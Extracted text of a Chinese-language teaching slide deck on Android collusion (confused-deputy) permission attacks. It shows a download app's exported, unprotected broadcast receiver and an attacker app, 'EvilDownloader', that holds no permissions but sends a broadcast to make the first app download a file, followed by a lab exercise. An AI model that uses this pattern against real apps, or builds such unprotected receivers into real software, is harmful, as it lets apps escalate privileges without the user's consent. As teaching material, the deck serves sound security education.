串谋权限攻击.pptx

;串谋权限攻击 Android程序中资源访问涉及 使用Framework提供功能 经过系统提供权限机制进行控制 2. 访问其他程序组件 其他组件自定义权限控制 正常情况下，没有申明特定访问权限，就无法访问这些资源;串谋权限攻击 但经过其他程序中可访问Android组件，就有可能突破这种访问控制，从而提升程序本身权限，这种权限提升攻击方式称为串谋权限攻击。 串谋权限攻击原理如图7.1所示： ;串谋权限攻击实例 在下载管理程序中DownloadManager中输入要下载文件URL，点击载按钮能够下载文件并保存到SD卡上 DownloadManager有下载文件与保存到SD卡上权限 DownloadManagerAndroidManifest.xml声明如下： uses-permission android: name=“android.permis sion.WRITE_EXTERNAL_STORAGE”／ uses-permission android: name=“android. permission.INTERNET”／;串谋权限攻击实例 下载文件功能是经过接受下载祈求广播，在下载广??接受者中完毕 广播接受者在AndroidManifest.xml中申明如下: receiver android: name=”. DownloadReceiver” intent- filter action android: name=”com.droider.download /action /intent- filter /receiver;串谋权限攻击实例 DownloadReceiver响应action为“com.droider.download”广播，然后按Intent指定URL下载文件，响应广播代码如下： public void onReceive (Context context, Intent intent) { if(intent. getAction().equals(”com. droider. download‘’)) { String url=intent. getExtras().getString(”url”); String fileName=intent. getExtras().getString(”filename”); Toast. makeText( context, url, Toast. LENGTH_SHORT). show(); try{ downloadFile (url， fileName); //下载文件;下载文件名由url字符串传过来，保存 // 文件名经过filename传递过来 } catch (IOException e) { e．printStackTrace()； } } };串谋权限攻击实例 攻击程序EvilDownloader，无任何权限，只需发送文件下载祈求广播 btn1. setOnClickListener( new OnClickListener() { @Override public void onClick(View v) { Intent intent=new Intent(); //创建Intent对象 intent. setAction(”com. droider. download”)； intent. putExtra(“url”,“http://developer. android. com/images/home/android-jellybean. png”); //要下载文件URL;串谋权限攻击实例 String fileName=“jb.png”; //保存文件名 intent. putExtra(“filename”, fileName) ; sendBroadcast(intent); //发送广播 } })； EviIDownloader实例下载文件按钮被点击后，执行以上代码 DownloadReceiver收到广播后开始下载文件，完毕串谋攻击;试验7.1 串谋权限攻击 试验： 1、安装运营DownloadReceiver和EvilDownloader 2、实现串谋攻击 注意：将要下载文件改成本机